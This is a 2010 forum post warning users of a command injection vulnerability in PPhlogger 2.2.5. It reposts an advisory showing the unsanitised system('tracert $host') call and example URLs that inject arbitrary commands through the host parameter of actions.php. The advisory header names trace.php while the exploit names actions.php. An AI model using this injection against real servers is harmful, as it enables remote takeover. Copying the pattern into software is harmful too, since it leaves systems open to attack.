Page 1 of 1

Security issue

PostPosted: Mon Jun 07, 2010 1:55 pm
by Razr
Heads up everyone:

Remote Command Execution Vulnerability
========================================================================
PPhlogger <== 2.2.5 (trace.php)

[+] Author : Sn!pEr.S!Te Hacker #
# [+] Email : sniper-site@HoTMaiL.coM #
# [+] T34M Sn!pEr.S!Te Hacker #
# [+] 27-5-2010 #
# [+] Script :lmage ยป PPhlogger #
# [+] Download:http://sourceforge.net/projects/pphlogger/files/pphlogger/2.2.5/pphlogger-2.2.5.zip/download #
# Version: [2.2.5] #

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
Exploit : pphlogger/actions.php

http://localhost/pphlogger/actions.php?host= [your command]

http://127.0.0.1/pphlogger/actions.php?host= [your command]

system("tracert $host");

line: 56

More over at: http://www.exploit-db.com/exploits/12766/